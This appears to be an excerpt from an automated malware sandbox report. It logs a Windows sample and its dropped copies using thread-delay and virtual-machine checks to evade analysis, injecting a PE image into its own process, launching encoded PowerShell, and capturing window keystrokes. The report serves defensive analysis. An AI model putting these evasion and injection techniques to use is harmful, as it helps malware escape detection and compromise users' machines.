                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWindow / User API: threadDelayed 9473Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWindow / User API: threadDelayed 9713Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9689Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9447
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWindow / User API: threadDelayed 9680
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9658
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9268
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWindow / User API: threadDelayed 525
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9118
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199577Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199436Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199296Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199155Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1199028Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198890Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198750Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198624Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198500Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198305Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198191Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1198046Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197934Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197796Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197640Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197531Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197421Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197296Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197171Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1197027Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196889Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196774Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196671Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196548Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196390Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196281Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1196171Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195937Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195750Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195636Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195528Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195421Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195312Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195202Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1195089Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194968Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194859Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194749Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194636Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194530Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194420Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194312Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194201Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1194093Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193984Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193869Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193749Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193640Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeThread delayed: delay time: 1193530Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1199711
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198567
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198396
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1198009
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1196965
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeThread delayed: delay time: 1196558
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: Vlrvln.exe, 00000004.00000002.515947935.000000000165F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                Source: kDPmkTm.exe, 0000000B.00000002.613827375.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Vlrvln.exe, 00000004.00000002.515947935.000000000165F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Encrypted powershell cmdline option found
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: Base64 decoded start-sleep -seconds 20
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeMemory written: C:\Users\user\Desktop\PSFBGrvmxy.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeMemory written: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r{Win}r
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r{Win}
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Users\user\Desktop\PSFBGrvmxy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Users\user\Desktop\PSFBGrvmxy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
